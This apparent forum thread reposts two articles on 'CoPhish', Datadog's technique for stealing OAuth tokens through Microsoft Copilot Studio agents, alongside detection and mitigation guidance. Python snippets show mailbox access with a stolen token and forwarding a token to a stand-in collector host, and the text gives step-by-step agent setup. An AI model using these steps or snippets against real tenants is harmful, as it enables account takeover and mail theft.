CoPhish: OAuth Token Theft Using Microsoft Copilot Studio

Microsoft’s Copilot Studio can be weaponized to steal OAuth tokens — an attack chain Datadog Security Labs has dubbed “CoPhish” — by hosting malicious agents on Microsoft domains and using the agents’ built‑in sign‑in workflows to deliver convincing OAuth consent prompts that exfiltrate tokens to attacker infrastructure.

Background

Microsoft’s Copilot Studio and related agent tooling are designed to let organizations and individuals build low‑code AI assistants (agents) with customizable “topics” and a hosted demo page so others can try the agent. That convenience is also the attack surface CoPhish exploits: a malicious actor can create or configure an agent so its Login topic triggers an OAuth consent flow for an attacker‑controlled application and then immediately forward the resulting access token to a third‑party endpoint under the attacker’s control. Because the agent’s demo page is hosted on Microsoft infrastructure (copilotstudio.microsoft.com), the UI and domain look legitimate — increasing the chance victims will accept consent requests.
Datadog’s proof‑of‑concept shows how the agent’s topic automation can send the token directly from Microsoft infrastructure (not from the victim’s browser), hiding the exfiltration from outbound traffic logs and making detection by simple network monitoring difficult. The result: an attacker can obtain a bearer token that grants Microsoft Graph permissions the victim approved — for example Mail.ReadWrite or Notes.ReadWrite — and then act on behalf of the user through APIs or Copilot actions.
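To make the post-consent risk concrete, the minimal Python sketch below shows how little an attacker needs once a delegated token has leaked. The token value is a placeholder, and the call assumes the victim consented to Mail.ReadWrite; this is an illustration of the mechanics, not Datadog's tooling.

```python
import requests

# Placeholder for a delegated access token captured by a malicious agent.
stolen_token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIs..."

# With Mail.ReadWrite consented, the bearer token alone reads the mailbox:
# no password, no MFA prompt, no sign-in from an unusual device.
resp = requests.get(
    "https://graph.microsoft.com/v1.0/me/messages?$top=5",
    headers={"Authorization": f"Bearer {stolen_token}"},
    timeout=30,
)
resp.raise_for_status()
for message in resp.json()["value"]:
    print(message["subject"])
```

From the tenant's perspective this traffic looks like an authorized application acting on the user's behalf, which is exactly why consent governance matters more than network monitoring here.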

Why CoPhish matters: OAuth token theft, trust, and automation​

The core problem: delegated consent and trusted hosting​

OAuth is intentionally built to let users grant third‑party applications delegated access to their resources. That model depends on users being able to reason about what they’re consenting to and on governance rules that limit what non‑verified apps can request or what non‑administrators can approve.
CoPhish combines three high‑impact primitives:
  • A legitimate Microsoft domain hosting the lure (trusted appearance).
  • A standard OAuth consent flow that issues bearer tokens when users approve permissions.
  • Low‑code automation inside the agent that can forward tokens or immediately take actions using those tokens.
When these primitives are chained, attackers obtain tokens that are functionally equivalent to keys to the victim’s account — and because the flow uses Microsoft endpoints, simple indicators such as unusual outbound IPs from the victim’s device are absent.

The social‑engineering multiplier​

Visual trust is powerful: users are conditioned to trust known brands and domains. An agent demo page that looks like a first‑party Copilot UI on a Microsoft domain erodes common red flags (unknown domain, bad TLS, odd layout) and therefore dramatically increases the probability that a user — even an administrator — will grant consent. Success still hinges on social engineering at scale, but the trust anchor shifts from “a convincing fake page” to “an apparently legitimate Microsoft page.”

Technical anatomy: step‑by‑step​

How an attacker sets up CoPhish​

  • Create (or compromise) a Copilot Studio agent in any Entra ID tenant with a Copilot Studio license or trial. The agent can be in the attacker’s tenant; cross‑tenant targeting is possible because the demo URL lives on Microsoft infrastructure.
  • Modify the agent’s Login topic (or other relevant automation topics) so that the sign‑in triggers an OAuth authorization request for an application that the attacker controls — requesting delegated scopes such as Mail.ReadWrite, Mail.Send, or Notes.ReadWrite.
  • Add an automation step that forwards the obtained token (for example, as an HTTP header or POST) to an attacker‑controlled endpoint (Burp Collaborator in the PoC). Because the request originates from Copilot Studio, it will originate from Microsoft’s IPs.
  • Distribute the agent’s demo URL (copilotstudio.microsoft.com/…) via phishing email, Teams message, or other lures. The victim clicks, sees the familiar UI, clicks Login, authorizes the application, and is unaware that the token has been forwarded.

What the stolen token allows​

  • Acting as the user via Microsoft Graph: read/write email, send messages, enumerate files, manage calendar invites.
  • Immediate automation from the agent itself: the agent can use the token to call Graph endpoints to fetch data, inject content, or create further lures (for example, phishing emails sent from the victim’s mailbox).
Decoding the token in Datadog’s PoC showed Mail.Send and Mail.ReadWrite scopes, demonstrating the practical risk of lateral phishing and data exfiltration.
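Checking what a captured token can actually do is straightforward. The standard-library sketch below decodes the unverified JWT payload the way a responder (or Datadog's PoC) would inspect scopes; the token here is fabricated for demonstration.

```python
import base64
import json

def decode_jwt_payload(token: str) -> dict:
    """Return the (unverified) claims from a JWT access token."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)  # restore stripped base64 padding
    return json.loads(base64.urlsafe_b64decode(payload))

# Fabricated token carrying the scopes Datadog observed, for illustration only.
claims = {"scp": "Mail.Send Mail.ReadWrite", "upn": "victim@contoso.com"}
body = base64.urlsafe_b64encode(json.dumps(claims).encode()).rstrip(b"=").decode()
demo_token = f"header.{body}.signature"

print(decode_jwt_payload(demo_token)["scp"])  # -> Mail.Send Mail.ReadWrite
```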

Who is at risk?​

High‑value targets​

  • Administrators with consent‑granting roles (Application Administrator, Cloud Application Administrator) are top targets because they can approve broader scopes and app permissions that end users cannot. If an admin consents, the attacker can request far more powerful scopes.
  • Regular users remain at risk where tenant consent policies still allow certain delegated scopes (for example Mail.ReadWrite) to be self‑consented by members. Those privileges are enough to read and send email, modify calendars, and escalate attacks internally.

Enterprise-wide exposure​

Because Copilot Studio demo pages are shareable and hosted under Microsoft domains, a targeted link can be distributed broadly (email, Teams, corporate forums), creating a low‑effort method for attackers to reach users inside a tenant while preserving the appearance of legitimacy.

Detection challenges and forensic footprints​

  • The exfiltration POSTs can originate from Microsoft IP ranges and will not necessarily show up as outbound connections from the victim’s device, defeating simple egress filtering or network IDS heuristics. Datadog’s PoC specifically demonstrates token forwarding from Microsoft infrastructure rather than the user’s browser.
  • Standard web proxies and EDRs that inspect user browser traffic will see the normal authentication flow to Microsoft endpoints, which looks legitimate, making it hard to flag the consent step as malicious.
  • The most reliable telemetry comes from Entra ID audit logs (application consent events, new service principal creation, unusual approvals), Copilot Studio admin logs (agent creation/modification), and Graph API call logs made under the user’s identity after consent.
Because of these constraints, defenders must correlate identity logs with Copilot Studio activity rather than relying on device network logs alone.
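As a concrete starting point for that correlation, the sketch below pulls recent consent events from the Entra ID audit log via Microsoft Graph. It assumes you have already acquired an app-only token with AuditLog.Read.All (acquisition omitted).

```python
import requests

graph_token = "<app-only token with AuditLog.Read.All>"  # acquisition not shown

resp = requests.get(
    "https://graph.microsoft.com/v1.0/auditLogs/directoryAudits",
    headers={"Authorization": f"Bearer {graph_token}"},
    params={
        "$filter": "activityDisplayName eq 'Consent to application'",
        "$top": "50",
    },
    timeout=30,
)
resp.raise_for_status()

for event in resp.json()["value"]:
    actor = (event.get("initiatedBy") or {}).get("user") or {}
    targets = [t.get("displayName") for t in event.get("targetResources", [])]
    print(event["activityDateTime"], actor.get("userPrincipalName"), targets)
```

Feeding these events into a SIEM alongside Copilot Studio admin logs gives the cross-signal view this section recommends.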

Vendor responses and policy shifts — what Microsoft has changed​

Microsoft has historically tightened self‑consent rules and Entra ID application consent defaults to reduce the risk of user‑consented elevation. Datadog’s analysis references Microsoft’s managed policy changes that further limit what regular users can consent to by default, and Microsoft has acknowledged the CoPhish disclosure and indicated product updates and governance changes are forthcoming. Independent reporting confirms Microsoft is investigating and planning mitigations.
However, important caveats remain:
  • Administrators retain the ability to grant consent to both internal and external unverified applications — a necessary operational capability that also creates an enduring attack surface if not tightly controlled.
  • Microsoft’s late‑October/November policy tweaks narrow user consent defaults, but they do not entirely remove the risk for privileged accounts or tenants where custom policies allow member consent to high‑risk scopes.
In short: Microsoft is acting, but governance and role hygiene inside tenant boundaries remain essential mitigations.

Practical mitigations — immediate, short‑term, and long‑term​

The defensive playbook for CoPhish and similar OAuth consent threats must be layered: governance, telemetry, user hardening, and incident response.

Immediate (within 48 hours)

  • Restrict admin consent scope. Ensure only a minimal, vetted set of identities hold Application Administrator or Cloud Application Administrator roles. Require out‑of‑band approvals for new app consents.
  • Enable the Microsoft‑managed default consent policy or a stricter custom policy that blocks member consent for high‑risk Graph scopes (Mail.ReadWrite, Calendars.ReadWrite, Files.Read.All). Review and apply Microsoft’s updated consent defaults if available.
  • Block or monitor Copilot Studio demo links in high‑value workflows. Treat any copilotstudio.microsoft.com demo URL as suspicious until validated for important targets.
  • Require phishing‑resistant MFA for privileged users. Implement FIDO2 or platform passkeys for admins to reduce adversary-in‑the‑middle risk.

Short term (days to 2 weeks)

  • Audit recently consented applications and service principals. Revoke suspicious or unnecessary consents. Re‑evaluate application permissions and limit them to least privilege (a Graph enumeration sketch follows this list).
  • Configure alerts for new Copilot agent creation, topic modifications, and demo URL generation in your tenant. Add monitoring for outbound POSTs from Copilot connector automation runs.
  • Harden app registration policies: forbid wildcard redirect URIs, restrict validDomains, and require verified publishers for apps requesting sensitive scopes.
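In support of the audit step above, here is a minimal enumeration of existing delegated grants that flags the high-risk scopes named in this article. It assumes a Graph token able to read directory grants (acquisition omitted); the risky-scope set is this article's examples, not an exhaustive list.

```python
import requests

graph_token = "<token with Directory.Read.All>"  # acquisition not shown
risky = {"Mail.ReadWrite", "Mail.Send", "Files.Read.All", "Calendars.ReadWrite"}

url = "https://graph.microsoft.com/v1.0/oauth2PermissionGrants"
while url:
    resp = requests.get(
        url, headers={"Authorization": f"Bearer {graph_token}"}, timeout=30
    )
    resp.raise_for_status()
    page = resp.json()
    for grant in page["value"]:
        scopes = set((grant.get("scope") or "").split())
        if scopes & risky:
            # clientId identifies the service principal holding the grant.
            print(grant["clientId"], grant["consentType"], sorted(scopes & risky))
    url = page.get("@odata.nextLink")  # follow server-side paging
```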

Long term (weeks to months)

  • Adopt a formal OAuth/consent governance program: periodic audits, justification for scopes, and approval workflows for any app requesting sensitive Graph permissions.
  • Expand telemetry to correlate Entra ID audit logs, Graph API activity, and Copilot Studio agent activity. Invest in SIEM rules that detect anomalous Graph calls by users who recently consented to new applications.
  • Engage suppliers and staff with targeted education: how to identify suspicious consent dialogs, and how to verify agent demo pages out‑of‑band before consenting. Practical drills can include simulated CoPhish scenarios to test readiness.

Detection and incident response playbook​

When you suspect a token compromise via CoPhish or similar OAuth consent phishing:
  • Revoke the affected user’s tokens and refresh tokens and force re‑authentication (revokeSignInSessions); this severs the immediate attacker session. A minimal call sketch follows this list.
  • Search Entra ID audit logs for the app consent event, service principal creation, and newly granted permissions. Record redirect URIs and publisher names.
  • Scan Graph activity for actions performed by the compromised identity (sent emails, created calendar events, files accessed). Prioritize containment where attackers used Mail.Send or Mail.ReadWrite to spread further lures.
  • Notify impacted users and rotate credentials for any service principals or application secrets that may have been exposed. While changing passwords alone is insufficient if refresh tokens were stolen, rotating app secrets and revoking tokens narrows the attacker’s window.
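For the revocation step above, a minimal sketch of the Graph call follows. The identifiers are placeholders, and an admin token with User.ReadWrite.All is assumed (acquisition omitted).

```python
import requests

graph_token = "<admin token with User.ReadWrite.All>"  # acquisition not shown
user = "victim@contoso.com"  # UPN or object id of the affected account

resp = requests.post(
    f"https://graph.microsoft.com/v1.0/users/{user}/revokeSignInSessions",
    headers={"Authorization": f"Bearer {graph_token}"},
    timeout=30,
)
resp.raise_for_status()
# Refresh tokens are now invalid; already-issued access tokens remain valid
# until expiry, so pair this with revoking the malicious app's grants.
```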

Critical analysis: strengths, vendor responsibility, and residual risks​

Strengths of the attack model​

  • CoPhish is elegant in its simplicity: it does not require a zero‑day or malware payload. Building a malicious agent, registering an app, and crafting a convincing consent flow are low‑cost operations with high potential impact. Datadog’s PoC demonstrates operational feasibility.
  • The use of Microsoft infrastructure to host the lure is a force multiplier for social engineering, exploiting user trust in domains and UI familiarities.

Microsoft’s position and responsibilities​

  • Microsoft is hardening consent defaults and the Copilot Studio governance model — actions that reduce the attack surface for non‑privileged accounts. Public reporting shows Microsoft acknowledged the issue and plans product updates. However, platform hardening must be paired with tenant‑level governance because administrators still retain consent power by design.

Residual risks and caveats​

  • Even with stricter defaults, privileged roles are an enduring risk; if an admin is socially engineered, an attacker can still obtain powerful tokens. That means role assignment, least privilege, and out‑of‑band approval remain critical.
  • The public record to date shows proof‑of‑concepts and confirmed platform weaknesses, but quantifying real‑world exploitation (how many tenants were compromised, how many admins were tricked) remains hard. Early reporting has not demonstrated widescale, confirmed production compromises specifically attributable to Copilot Studio abuse prior to disclosure; treat broad claims of mass compromise as plausible but unquantified until telemetry is published.

Recommendations for WindowsForum readers (practical, prioritized)​

  • If you’re an admin: Immediately audit who in your tenant can grant app consent. Apply the Microsoft‑managed consent defaults or a stricter custom policy. Enforce phishing‑resistant MFA (FIDO2) for all privileged roles. Add Copilot Studio demo URL monitoring to your email/Teams/content filtering.
  • If you’re a security engineer: Build SIEM detections for post‑consent Graph calls, new service principal creation events, and Copilot agent creation/modification events. Correlate these signals to detect post‑consent abuse faster.
  • If you’re an end user: Treat any consent dialog that requests broad access to your mailbox or files with suspicion. Validate the request out‑of‑band (e.g., ask the issuer via a separate verified channel) before consenting. If you see unexpected sent mail or calendar invites, report immediately.

Final assessment​

CoPhish is a clear reminder that as enterprise systems gain automation and low‑code extensibility, the attack surface shifts from purely technical vulnerabilities to governance and human trust. The technique described by Datadog is practical, leverages existing OAuth flows, and benefits from Microsoft hosting to increase social engineering success. Microsoft’s policy changes and commitments to product updates are necessary steps, but they are not a comprehensive fix for tenant governance gaps — especially where high‑privilege administrative consent remains a capability.
Defenders must treat Copilot Studio and other low‑code agent platforms as part of the identity threat surface: enforce least privilege, harden consent policies, monitor identity telemetry closely, and require phishing‑resistant authentication for privileged roles. These operational controls — combined with platform hardening by vendors — are the best means to reduce the risk that a friendly looking AI assistant becomes a silent token harvester.

This analysis synthesizes Datadog’s technical write‑up and independent reporting on the CoPhish technique, and it recommends prioritized, defensible mitigations administrators can apply today to reduce the odds of token theft via Copilot Studio agents.

Source: Techzine Global How attackers use Microsoft agents to steal OAuth tokens
 

Security teams are facing a fresh, elegant twist on OAuth phishing: researchers at Datadog Security Labs have documented a technique—dubbed CoPhish—that weaponizes Microsoft Copilot Studio agents to harvest OAuth tokens and persistent permissions by abusing legitimate Microsoft domains and low‑code automation flows.

Background

Microsoft Copilot Studio is a low‑code platform for creating and publishing AI assistants (agents). Agents can be published to a built‑in demo website hosted on copilotstudio.microsoft.com or embedded in other channels, and they support configurable authentication flows and automated topic logic. That flexibility makes Copilot Studio useful for defenders and attackers alike.
Datadog’s disclosure shows how a malicious or compromised agent can present a convincing sign‑in UI, redirect users into an OAuth consent flow, collect the resulting session token, and then quietly forward that token to an attacker‑controlled endpoint or use it in the agent’s automation pipeline. Because the agent runs on Microsoft infrastructure and uses Microsoft domains during the flow, the operation looks and behaves like a legitimate service—dramatically lowering user suspicion.
Microsoft has publicly acknowledged the problem and told reporters it is investigating and planning product updates to harden governance and consent experiences. Microsoft describes the technique as social engineering but says it will evaluate additional safeguards to reduce misuse.

Why CoPhish matters: the technical and operational risk​

This is not a classic credential harvest; it exploits OAuth and Entra ID consent mechanics. The core risk factors:
  • Token‑based access: OAuth access tokens grant API access (Microsoft Graph, mail, chat, calendars, files) without exposing passwords. A stolen token can provide persistent programmatic access until revoked or expired. Datadog demonstrated tokens returned with scopes such as Mail.ReadWrite, Mail.Send, Chat.ReadWrite, and Notes.ReadWrite.
  • Trusted domain abuse: The malicious agent is served from copilotstudio.microsoft.com (the legitimate Microsoft domain used for Copilot Studio demo sites). Users seeing a Microsoft URL are less likely to suspect phishing.
  • Low‑code automation exfiltration: Copilot Studio topics (automations) can be modified by agent authors. Datadog showed how the built‑in sign‑in topic can be backdoored to include an HTTP request that forwards the captured User.AccessToken variable to an attacker-controlled endpoint—triggering exfiltration from within Microsoft infrastructure. Because the request originates inside Microsoft’s systems, it may not appear in the user’s client network logs.
  • Two realistic attacker scenarios:
    • Scenario 1 — targeting ordinary tenant users: attackers trick a user who can consent to a set of delegated permissions permitted by the tenant’s default consent policy. That can still include sensitive scopes like mail, chat, and calendars depending on tenant settings.
    • Scenario 2 — targeting administrators: users with Cloud Application Administrator or Application Administrator roles can grant broader permissions (including high‑risk and application permissions), enabling an attacker to gain powerful privileges across the tenant. Datadog emphasized administrators remain a high‑value target because default user consent policies do not restrict their ability to consent.
  • Traffic invisibility: Because authentication and the agent runtime involve Microsoft infrastructure (including the Bot Framework endpoint token.botframework.com during validation), some of the exchanges occur server‑side and won’t appear as outbound calls from the victim’s machine to an attacker domain—complicating detection. Datadog demonstrated use of the Bot Connection Validation step and server‑side token capture.

How the CoPhish workflow works — step by step​

  • Attacker builds or reuses a Copilot Studio agent in their own tenant (or a compromised tenant), configuring the agent’s Authentication → Authenticate manually settings to point at a malicious OAuth app (multi‑tenant app registration) with a reply URL that fits the Bot Framework redirect pattern.
  • The attacker tweaks the agent’s system sign‑in topic (a configurable automation triggered by sign‑in) to insert an HTTP Request action that sends the User.AccessToken to an external collector (for example, a Burp Collaborator URL used in Datadog’s lab). That HTTP request runs from Copilot Studio servers.
  • The agent is published to its demo website (copilotstudio.microsoft.com/…), giving the attacker a legitimate Microsoft URL to share with victims.
  • The attacker lures victims (via email, Teams, social engineering, SEO, or other distribution channels) to the demo site. The agent’s UI looks like a Microsoft Copilot dialog and includes a visible Login button.
  • When the victim clicks Login, the flow redirects to the malicious OAuth consent page. If the victim consents, Entra ID issues an access token and the Bot Framework validation step exchanges a code and displays a numeric validation token to the user—part of the normal Copilot sign‑in UX. The agent receives the User.AccessToken and the embedded HTTP request forwards it to the attacker.
This sequence means the user completes a plausible Microsoft sign‑in flow and is not shown (by default) any obvious indication that their token was relayed to an attacker.
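To make the exfiltration step concrete, this sketch approximates in Python what the backdoored sign-in topic's HTTP Request action does with the User.AccessToken variable. The collector URL is hypothetical, and in the real attack the request is issued by Copilot Studio's topic engine, not by code the victim runs.

```python
import requests

COLLECTOR = "https://collector.example.net/ingest"  # hypothetical attacker endpoint

def forward_token(user_access_token: str) -> None:
    # Equivalent of the backdoored topic's HTTP Request action: as soon as
    # sign-in completes, the token leaves via Microsoft IP ranges, so the
    # victim's own device never contacts the attacker's domain.
    requests.post(
        COLLECTOR,
        headers={"Authorization": f"Bearer {user_access_token}"},
        timeout=10,
    )
```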

Verification and independent confirmations​

Datadog published a detailed technical write‑up and proof‑of‑concept explanations showing the exact configuration, the reply URL pattern, and how the sign‑in topic can be backdoored.
Independent security outlets and industry press reviewed Datadog’s findings and corroborated the core technical narrative. Several publications quoted Microsoft confirming it had investigated and would address the issue through product updates while framing the technique as social engineering. That independent reporting aligns with Datadog’s lab description and Microsoft’s public response.
Caveat and caution: Datadog’s disclosure demonstrates the method in a lab and provides indicators and telemetry guidance. There are, at the time of reporting, no widely published cases of large‑scale active exploitation tied to CoPhish in the wild; this remains a proof‑of‑concept escalation path with clear real‑world risk. Defenders should nonetheless treat lab demonstrations like this as high‑priority, actionable intelligence, because the attack depends on human consent rather than a remote code execution vulnerability.

Immediate mitigations: what security teams must do now​

The good news for defenders is most mitigations are operational controls already supported by Entra ID, Microsoft 365, and Copilot Studio; they require configuration and monitoring rather than waiting for a product patch.
  • Restrict user consent for application permissions
    • Set the tenant app consent policy so that end users cannot consent to high‑risk delegated permissions. Microsoft has been updating its managed default consent policy: changes rolled out in mid‑2025, with further tightening scheduled for late October 2025 to curtail the scopes users can consent to. Administrators must verify their tenant’s effective consent policy and enforce admin consent for sensitive scopes.
  • Force admin approval for third‑party apps and block user app registration where appropriate
    • Disable or limit the default that allows Entra ID member users to register new applications. This closes the path where an attacker could create internal app registrations that users might mistakenly consent to. (A minimal Graph call for this setting is sketched after this list.)
  • Enforce Conditional Access and MFA for privileged roles and high‑risk actions
    • Apply Conditional Access policies requiring MFA for administrators and for any OAuth consent flows that involve high‑impact permissions. MFA reduces but does not eliminate the risk of token misuse, particularly when administrative consent is granted; Conditional Access can block risky sign‑ins from untrusted locations and non‑compliant devices.
  • Block or closely review published/shared Copilot Studio agents
    • Treat demo site links as sensitive: restrict who can publish agents to a demo website, centrally review and approve shared agents, and forbid public publication of internal agents. Use the Copilot Studio admin controls and channel settings to limit exposure.
  • Monitor and detect unusual app registrations, consent events, and Copilot Studio modifications
    • Configure SIEM and monitoring to alert on Entra ID audit activity such as Consent to application, new app registrations, addition of client secrets to rarely used applications, and application role grants. Monitor Copilot Studio audit events such as BotCreate, BotComponentUpdate, and BotUpdateOperation-BotAuthUpdate for unexpected agent creations or sign‑in topic edits. Microsoft documents the relevant audit logs and how to access them via Purview and Microsoft Entra.
  • Revoke suspicious tokens and app grants immediately
    • If a consent looks suspicious, revoke the app’s granted permissions via Entra ID (remove delegated permission grants and secrets, disable the app registration) and rotate any affected credentials. Use the Microsoft Entra audit log to find Consent to application events and remediate.
  • Harden admin workflows and least privilege
    • Reduce the set of users who can approve applications. Move to just‑in‑time elevation for roles and require dual control for admin consent where possible. Audit and remove unneeded privileged roles.
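For the app-registration control above, the setting can be flipped tenant-wide with a single Graph call. The sketch assumes an admin token with Policy.ReadWrite.Authorization (acquisition omitted).

```python
import requests

graph_token = "<admin token with Policy.ReadWrite.Authorization>"  # not shown

resp = requests.patch(
    "https://graph.microsoft.com/v1.0/policies/authorizationPolicy",
    headers={
        "Authorization": f"Bearer {graph_token}",
        "Content-Type": "application/json",
    },
    # Prevent ordinary member users from registering new applications.
    json={"defaultUserRolePermissions": {"allowedToCreateApps": False}},
    timeout=30,
)
resp.raise_for_status()  # Graph returns 204 No Content on success
```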

Detection and response playbook (detailed)​

  • Triage the alert
    • If you see a suspicious Consent to application event or an unexpected BotCreate/BotComponentUpdate event, collect the tenant ID, actor, timestamp, application ID, and the scopes requested. Microsoft’s audit logs and Datadog’s recommendations show which fields are important to capture.
  • Identify affected accounts and tokens
    • Query Microsoft Entra / Azure AD audit logs for Consent to application and cross‑reference with Microsoft 365 audit and sign‑in logs. Identify which users consented and whether any of them are high‑privilege.
  • Revoke consents and disable the application registration
    • Use the Entra admin center or PowerShell to remove delegated permission grants and delete or disable the malicious app registration. If the app had a client secret, rotate secrets across impacted services. (A sketch of the corresponding Graph call follows this list.)
  • Inspect Copilot Studio agents and topics
    • Search for recently created or modified agents, focusing on BotComponentUpdate entries where *.topic.Signin appears. Remove or quarantine suspicious agents and restore approved templates.
  • Hunt for lateral activity
    • Use Microsoft 365 and Graph telemetry to look for automated or unusual API calls made with the stolen scopes (e.g., Mail.Send spikes, mailbox reads, mass calendar exports). Prioritize accounts with Mail.ReadWrite and Chat.ReadWrite scopes.
  • Reassess tenant consent posture
    • Confirm app consent policies, disable user app creation if appropriate, and require admin consent for all high‑risk scopes. Microsoft’s Secure by Default updates and the managed consent policy should be reviewed and applied.
  • Communicate and train
    • Notify impacted users, rotate credentials if any passwords were exposed, and refresh targeted phishing training to include tactics that weaponize vendor‑hosted resources and trusted domains.
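For the revocation step above, deleting the suspicious delegated grant is one Graph call. The grant id is a placeholder (it comes from an oauth2PermissionGrants listing), and a token with DelegatedPermissionGrant.ReadWrite.All is assumed.

```python
import requests

graph_token = "<token with DelegatedPermissionGrant.ReadWrite.All>"  # not shown
grant_id = "<id of the suspicious oauth2PermissionGrant>"  # from a grants listing

resp = requests.delete(
    f"https://graph.microsoft.com/v1.0/oauth2PermissionGrants/{grant_id}",
    headers={"Authorization": f"Bearer {graph_token}"},
    timeout=30,
)
resp.raise_for_status()
# The app can no longer exercise the delegated permissions; also disable the
# app registration and rotate its secrets as described above.
```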

Product and platform implications — what Microsoft can/should do​

Datadog framed CoPhish as a social‑engineering exploitation of legitimate product features. That suggests mitigation can come from both policy changes and product hardening:
  • Harden default consent scope management so that demo or publicly shared agents cannot redirect to arbitrary OAuth consent workflows without additional approval or explicit admin gating.
  • Add automated checks to Copilot Studio publishing that flag unusual authentication templates (e.g., manual authentication templates that use multi‑tenant app registrations and the Bot Framework redirect) and require elevated approval before demo publication.
  • Surface clearer UI warnings when an agent asks for sign‑in that will grant third‑party or cross‑tenant permissions, and record transparent consent receipts that show where tokens will be used or forwarded.
  • Provide built‑in telemetry and sentinel templates tuned for BotCreate, BotComponentUpdate (especially on sign‑in topics) and sudden permission grants from non‑standard apps.
Microsoft has indicated it will work on product updates to reduce abuse of governance and consent experiences. In addition to product changes, Microsoft has already been tightening default tenant consent settings as part of its Secure by Default initiative—changes that reduce the surface for user‑consent attacks for many tenants if administrators adopt them.

Strengths of the research and remaining blind spots​

Notable strengths
  • Datadog’s analysis is technical and reproducible: it includes concrete configuration steps, payload examples, and log events to monitor—turning abstract concerns into actionable AD/tenant controls security teams can implement immediately.
  • The technique highlights a systemic problem: trusted domain + low‑code automation + OAuth is a powerful combination for social engineers, and documenting this helps defenders build detection and policy countermeasures.
Potential gaps and caveats
  • Demonstration vs. active exploitation: Datadog’s work is a responsibly disclosed lab demonstration. There is no public, verifiable evidence (at the time of reporting) that CoPhish is being widely used in ongoing campaigns; however, proof‑of‑concepts like this frequently accelerate adoption by opportunistic attackers if left unmitigated. That means defenders must assume the method will be attempted in the wild.
  • Dependency on human consent: Because the attack relies on users clicking Login and consenting, strong user awareness and UI improvements can reduce success rates, but determined attackers can still target high‑value administrators with personalized social engineering.
  • False‑positive risk in detection: Alerting on all Copilot Studio agent creations or sign‑in topic updates will generate noise in large organizations. Detection engineering must be tuned to spot anomalous patterns (unexpected owners, external app IDs, uncommon redirect targets, or secrets added to rarely used apps). Datadog and Microsoft logs provide the fields you need, but SOCs must invest in context enrichment.

Policy checklist for Microsoft 365 / Entra administrators​

  • Verify your tenant’s app consent policy and set Microsoft‑managed defaults or stricter custom rules that require admin consent for sensitive Graph scopes.
  • Disable user application registration unless explicitly needed.
  • Require Conditional Access + MFA for admin roles and enforce device compliance for sign‑ins.
  • Configure Purview / Microsoft 365 Audit log alerts for: Consent to application, BotCreate, BotComponentUpdate, and BotUpdateOperation-BotAuthUpdate.
  • Periodically review OAuth app registrations and permission grants (use automated checks to detect rarely used apps that suddenly receive new secrets or credentials).
  • Lock down Copilot Studio publication: restrict who can publish agents to demo websites and require an internal approval workflow for any agent that requires authentication.

The bottom line​

CoPhish is a timely reminder that modern phishing is moving beyond spoofed domains and stolen passwords into the orchestration layers of cloud platforms and low‑code automation. By combining a legitimate, vendor‑hosted UI with an OAuth consent flow and internal automation, attackers can craft convincing, high‑value phishing experiences that hand them tokens instead of credentials.
The good news is that the primary mitigations are well known to identity and security teams: tighten app consent, restrict who can register or approve apps, enforce conditional access and MFA for privileged actions, and instrument audit logs to detect unusual consent or agent behavior. Datadog’s research provides precise telemetry fields and event names to monitor, and Microsoft’s platform already offers the controls and logging needed to detect and respond—if organizations prioritize these configurations now.
Treat Copilot Studio agents and their demo URLs as sensitive artifacts in your threat model, verify any external apps that request permissions, and assume that a well‑crafted social engineering campaign could try to weaponize trusted vendor infrastructure. Implement the steps in this article as part of a coordinated response plan to reduce risk quickly while waiting for product hardening from platform vendors.

Source: TechRadar Experts warn Microsoft Copilot Studio agents are being hijacked to steal OAuth tokens
 
